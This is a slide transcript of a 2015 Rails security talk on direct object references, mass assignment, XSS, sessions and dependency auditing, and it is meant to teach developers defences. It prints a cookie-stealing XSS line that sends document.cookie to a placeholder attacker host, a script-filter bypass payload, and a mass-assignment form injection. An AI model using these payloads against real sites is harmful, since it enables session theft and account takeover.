Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Rails Security TL;DR (v2)

Andrew Kampjes
June 24, 2015
Programming
0
120

Rails Security TL;DR (v2)

Presentation that I gave at the Wellrailed meetup. This is a uber-condensed version of what Rails devs need to be thinking about when writing applications and how they can fit security into their development practices.

This version has some learnings from my working with development teams at safestack.io

Andrew Kampjes

June 24, 2015
Tweet

More Decks by Andrew Kampjes

See All by Andrew Kampjes
Suprise Features in your Favorite Framework
akampjes
1
2.8k
Rails Security TL;DR
akampjes
1
2.7k

Other Decks in Programming

See All in Programming
Code Reviews
bkuhlmann
4
890
CDKコントリビュートの最初の壁を越えよう! -簡単issueの見つけ方-
badmintoncryer
2
120
CA.swift19 恋するAIアプリ開発の裏側
oskmr
0
370
Go製Webアプリケーションのエラーとの向き合い方大全、あるいはやっぱりスタックトレース欲しいやん / Kyoto.go #50
utgwkk
2
110
R言語の環境構築と基礎 Tokyo.R 112
bob3bob3
0
270
AWS CDKコントリビュートTIPS / aws-cdk-contribution-tips
gotok365
3
240
VS Code をプロダクトにどう取り込むか
onomax
1
480
Git Rebase
bkuhlmann
11
1.6k
Build Apps for iOS, Android & Desktop in 100% Kotlin With Compose Multiplatform (mDevCamp 2024)
zsmb
0
370
Ruby Function Composition
bkuhlmann
1
330
Behind VS Code Extensions for JavaScript / TypeScript Linnting and Formatting
unvalley
5
1.1k
Elm 0.19.0 Changes
bkuhlmann
0
490

Featured

See All Featured
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
501
140k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
244
20k
Agile that works and the tools we love
rasmusluckow
325
20k
Building Your Own Lightsaber
phodgson
99
5.7k
The Straight Up "How To Draw Better" Workshop
denniskardys
227
130k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
2
3.4k
A Modern Web Designer's Workflow
chriscoyier
689
190k
Automating Front-end Workflow
addyosmani
1356
200k
Optimizing for Happiness
mojombo
370
69k
From Idea to $5000 a Month in 5 Months
shpigford
377
45k
Mobile First: as difficult as doing things right
swwweet
216
8.6k
10 Git Anti Patterns You Should be Aware of
lemiorhan
648
58k

Transcript

  1. Rails Security TL;DR @akampjes [email protected]

  2. None

  3. We all want to be better developers

  4. Because it’s fun and interesting

  5. “No-one said it had to be secure”

  6. None

  7. The Gartner Group estimates that 75% of attacks are at

    the web application layer, and found out: "that out of 300 audited sites, 97% are vulnerable to attack".

  8. Security is really HARD

  9. Github

  10. None

  11. Direct Object Reference

  12. None

  13. http://foo.com/orders/123

  14. Computers are fast

  15. http://foo.com/orders/123 http://foo.com/orders/124 … http://foo.com/orders/12345

  16. Don’t write this code: raise "nope" unless order.user == current_user

  17. Use pundit, cancan etc. https://www.ruby-toolbox. com/categories/rails_authorization

  18. Bonus: Use UUID for pkeys 128bits == BIG

  19. Mass Assignment

  20. Order.update(params)

  21. Github

  22. def update @key = PublicKey.find params[:public_key]['id'] @key.update params[:pubilc_key] end #

    Oh no! We passed public_key[user_id] of our victim!

  23. <input value=”ssh-rsa…” name=public_key[key]> <input value=USER_ID name=public_key[user_id]>

  24. strong params attr_accessable

  25. params.permit! :’(

  26. Context of use AdminUser vs RegularUser

  27. Cross Site Scripting (XSS)

  28. Running scripts on user’s computer

  29. Can do anything that the user can do

  30. <script>alert(1)</script>

  31. s/<\/?script>//

  32. <script<script>>alert(1)</script</script>>

  33. message posts, user comments, guest books, project titles, document names,

    search, urls, server headers, banner ads

  34. $.get('http://hacker.io?d='+document.cookie)

  35. Any unescaped or unsanitized javascript

  36. Old rails (2ish) you had to remember to escape. Each.

    Fucking. Input.

  37. html_safe() raw() h()

  38. SQL Injection

  39. Just kidding Solved problem* * http://rails-sqli.org/

  40. Sessions

  41. Defaults to Cookiestore

  42. SerializedObjects+HMAC (pre-rails4)

  43. Sensitive data

  44. Encrypt(SerializedObjects)+HMAC (rails4+)

  45. No Server Side logout

  46. Don’t use Cookiestore or...

  47. ...don’t trust data in session

  48. Don’t lose your secret_token or secret_key_base

  49. There’s a gem for that: CacheStore ActiveRecordStore MemCacheStore

  50. Finally

  51. Story time! As a hacker, I want to modify my

    order total, so that I can get free things.

  52. “Don't put off until tomorrow what you can do today”

    Ben Franklin on updates

  53. bundler-audit https://gemcanary.com/ https://gemnasium.com/

  54. manual: Code Review

  55. really easy: Brakeman

  56. Idealy: Write your own security tests

  57. Security issues crop up when we leave the beaten path.

  58. We can compensate by understanding why and how.

  59. Moar resources

  60. • http://guides.rubyonrails.org/security. html • https://www.owasp.org/index. php/Top_10_2013-Top_10 • http://railssecurity.com/ • http://www.happybearsoftware.

    com/rails-security-fundamentals • https://github.com/cktricky/railsgoat

  61. https://safestack.io/training.html

  62. Contact me, questions, comments @akampjes [email protected]